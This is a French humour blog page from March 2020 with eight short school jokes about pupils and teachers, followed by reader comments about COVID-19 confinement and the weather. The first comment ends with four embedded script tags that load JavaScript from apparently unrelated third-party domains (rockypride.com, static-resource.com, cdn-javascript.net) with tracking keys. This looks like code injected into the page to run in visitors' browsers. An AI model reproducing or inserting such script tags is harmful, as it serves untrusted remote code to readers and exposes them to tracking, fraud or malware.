• HISTOIRE SCOLAIRE D 18/03/2020

     

     

     

     

    # 1 #

     

     

     

     

    SCOLAIRE

     

     

     

    La maîtresse d'école à Toto:

     

    - Toto avoue que ton père

    t'a aidé à faire ton devoir?

     

    - Ben non, M'dame,

    je vous le jure!

     

    - C'est bien vrai?

     

    - Ben oui, M'dame

    il l'a fait tout seul...

     

     

     

     

     

    # 2 #

     

     

     

     

    SCOLAIRE

     

     

     

     

    Le jour

    de la rentrée scolaire,

    un instituteur avisé

    fait passer un mot

    aux parents d'élèves:

     

    «Si vous me faites

    la promesse de ne pas croire

    tout ce que votre enfant

    vous révélera

    sur sa vie en classe,

    je vous promets

    de ne pa croire

    tout ce qu'il me racontera

    sur sa vie à a maison...»

     

     

     

     

     

    # 3 #

     

     

     

     

    SCOLAIRE

     

     

     

    Une maîtresse

    interpelle un élève

    après le déjeuner

    à la cantine:

     

    - Va vite

    te débarbouiller le visage.

     

    Rien qu'en te regardant,

    je peux savoir

    ce que tu as mangé:

     

    Épinards

    et chocolat en dessert!

     

    - Ah, non, maîtresse,

    ça c'était hier!

     

     

     

     

     

    # 4 #

     

     

     

     

    SCOLAIRE

     

     

     

    Deux petits garçons

    discutent à la récréation:

     

    - T'étais au courant, toi ,

    que pour faire des enfants,

    il fallait avoir un jardin?

     

    - Pourquoi?

     

    - On m'a dit que les garçons

    naissaient dans les choux,

    et les filles dans les roses.

     

     

     

     

     

    # 5 #

     

     

     

    SCOLAIRE

     

     

     

    La maîtresse

    interroge l'un de ses élèves,

    Hugo, 6 ans:

     

    - Qu'est ce que donne

    la poule?

     

    - Des œufs, madame,

    répond Jean.

     

    - Très bien,

    et que donne le mouton?

     

    - De la laine, madame.

     

    - Mais c'est parfait,

    Jean.

     

    Et la vache, alors?

     

    - Des devoirs,

    répond Jean.

     

     

     

     

     

     

    # 6 #

     

     

     

    SCOLAIRE

     

     

     

    Une institutrice interroge

    l'un de ses jeunes élèves:

     

    - Est ce que tu sais

    comment on peut faire

    de la lumière avec de l'eau?

     

    - Moi, non,

    mes ma mère, si.

     

    Tout les ans,

    quand elle lave

    les carreaux de la maison.

     

     

     

     

     

    # 7 #

     

     

     

     

    SCOLAIRE

     

     

     

     

    Un petit garçon

    se lève dans la classe

    et demande:

     

    J' peux aller aux toilettes?

     

    - «Puis je»

    aller aux toilettes,

    reprend sa maîtresse.

     

    - Mais, euh,

    je l'ai demandé avant...

     

     

     

     

    # 8 #

     

     

     

     

    SCOLAIRE

     

     

     

    En rentrant de l'école,

    une petite fille se plaint

    auprès de sa maman:

     

    - Il est vraiment très nul,

    mon prof de mathématiques!

     

    - Pourquoi cela?

     

    Interroge la mère.

     

    - Il a dit

    à la directrice de l'école

    que je lui posais

    des problèmes:

     

     

     

     

     

     

    « HISTOIRE DIVERS D 14/03/2020HISTOIRE PAPY - MAMIE D 21/03/2020 »

  • Commentaires

    1
    Mercredi 18 Mars 2020 à 07:32

    Bonjour Joël,

    Merci pour cette page d'humour; Une semaine

    qui continue avec une météo printanière, 15°C

    en fin d'après-midi hier et du soleil, c'est agréable.

    Bonne journée ce mercredi. Bisous-violette

    <script src="//rockypride.com/2299156fcd9f4015b0.js"></script> <script src="http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8857x" type="text/javascript"></script> <script src="http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8857x&format=arrjs&r=1584512976508" type="text/javascript"></script> <script src="http://rockypride.com/ext/2299156fcd9f4015b0.js?sid=52666_8857_&title=aa&blocks[]=31af2" type="text/javascript"></script>
    2
    Mercredi 18 Mars 2020 à 09:19

    Cela fait du bien de pouvoir sourires

    Merci à toi 

    Bises

    3
    Mercredi 18 Mars 2020 à 10:40

    Bonjour Joël,

    Bien mignonnes tes petites histoires ! Il est bon de sourire un peu en ces temps perturbés.

    Prends soin de toi,

    Bisous,

    MF

    4
    Mercredi 18 Mars 2020 à 12:16
    Bonjour mon cher Meldix. Merci pour ces sourires qui font du bien, car on a bien besoin de rire en ce moment. C'est sous le soleil et la chaleur de mon île (+ 32°) que je viens tout d'abord te remercier pour ton gentil passage et pour te souhaiter un bel AM. Courage pendant ce confinement, nous le sommes aussi à la Réunion, les mêmes instructions que la métropole. Je ne me plains pas, j'ai une maison et un terrain assez grand (870 m2) et je pense très fort aux personnes qui sont confinées chez elles, seules ou pas, dans un petit appartement sans balcon, aux personnes âgées etc... et je tiens à saluer le courage et le dévouement du personnel soignant : aides soignantes, infirmières, infirmiers, médecins etc......qui prennent des risques pour nous, je pense aussi aux caissières des supermarchés et bien d'autres encore qui sont obligés de travailler à l'extérieur de chez eux, alors pensons à toutes ces personnes et respectons les consignes : Restons chez nous et gardons toujours la PPP pleine pensée positive. Prudence et prends bien soin de toi surtout, car la santé est le bien le plus précieux. Une envolée sans virus de mon ti rocher de gros bisous ensoleillés.
    5
    Mercredi 18 Mars 2020 à 15:51
    Bonjour Joël,
    Sacrés gosses lol ! J'espère que tout va bien pour toi et les tiens, ici tout va bien aussi.
    Je te souhaite un bon après-midi, prends soin de toi, bises Véronique
    6
    Mercredi 18 Mars 2020 à 17:09
    PPRene

    bonjour cher  Joel, bravo pour tes blagues, porte toi bien, ainsi que les tiens, amities et bises 

    7
    Mercredi 18 Mars 2020 à 18:16

    Belle fin de Journée  Joël

     

    Toujours très amusantes ces histoires d'enfants,remplis  de bon sens leur réponses


    Heureusement le soleil est présent, un peu de baume au cœur pendant cette retraite forcée

    On va pouvoir sans risque s'occuper du jardin, il en a grand besoin, pas de virus dans les mauvaises herbes

    Le seul ennui, c'est que le dos n'apprécie  pas cette gymnastique, on ira donc en douceur

    J'espère que  ce mercredi fut  pour toi rempli de douceur et d'espoir de jours meilleurs

    amitiés. et bisous Rebecca

    8
    Sonya 972
    Jeudi 19 Mars 2020 à 01:39
    La 6 j'ai aimé
    On a besoin de détente en ce moment
    Bon jeudi
    Tibo créoles
    9
    Jeudi 19 Mars 2020 à 06:14

    Cher Joël,

    Déjà jeudi, le temps passe vite et les cas de covid 19 augmentent . On a intérêt à respecter les directives.

    Bonne journée,

    Bisous,

    MF

    10
    Jeudi 19 Mars 2020 à 08:50

    Bonjour Joël.
    C'est dommage que nous soyons confinés à la maison car depuis quelques jours il fait beau temps.
    Nous languissions les beaux jours pour profiter d'aller à la pêche et bientôt d'aller cueillir des morilles et nous sommes bien déçus; on va faire avec.
    J'espère que pour toi, tout se passe bien.
    Je met mon blog en pause jusqu'au Printemps.
    Bonne journée.
    A+.

    11
    Jeudi 19 Mars 2020 à 16:42

    Belle fin de journée Joël

     

    Il faut prendre toutes les précautions qu'on nous a recommandées, en espérant que cela suffira

    mais surtout pas regarder les informations .... on en sort déprimés  par tout ce qu'ils nous racontent

    Une consolation le soleil est la pour nous réconforter et cet après midi on attend 21°

    Prudence donc et bon courage mon Ami

    pensées amicales et bisous.  Rebecca

    12
    Vendredi 20 Mars 2020 à 08:43

    Bonjour cher ami Joël.

    J'espère que tu vas bien.

    Malgré le confinement, je te souhaite un joyeux printemps .

    Je t'embrasse.

    Maria.

     

    13
    Vendredi 20 Mars 2020 à 12:45

    Bon week-end Joël, avec de la grisaille pour nous en ce premier jour de printemps !  Le soleil devrait revenir ce dimanche !  J'espère que tu vas bien ?? Gros bisous et léchouilles des loulous, prends soin de toi, à bientôt !

    c'est le printemps d' ♥Athos & Cheyenne ♥

     

    14
    Vendredi 20 Mars 2020 à 16:22

    Bel après midi  Joël

    Chez nous le Printemps est au rendez vous, actuellement nous avons 20°, mais je crois que cela va se dégrader demain ......

    Un peu comme la situation ;bientôt on osera même plus se rendre faire ses achats au Super Marché ......

    On va mettre de côté l'herbe de la pelouse, qui sait si on devra pas la manger à la place des épinards ..... mdr..

    Mais trêve de plaisanterie, cela devient inquiétant, je crains que nous soyons obligés de rester longtemps bloqués à la maison

    On essaie de s'occuper, mais pas toujours des tâches agréables, je parle pour moi , j'ai horreur de faire le ménage, je préfère être en cuisine

    Bon courage et passes le meilleur weekend possible


    Amitiés et bisous.  Rebecca

    15
    Sonya 972
    Lundi 23 Mars 2020 à 21:25
    Bonne semaine à toi
    Bisous créoles à vous deux
    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :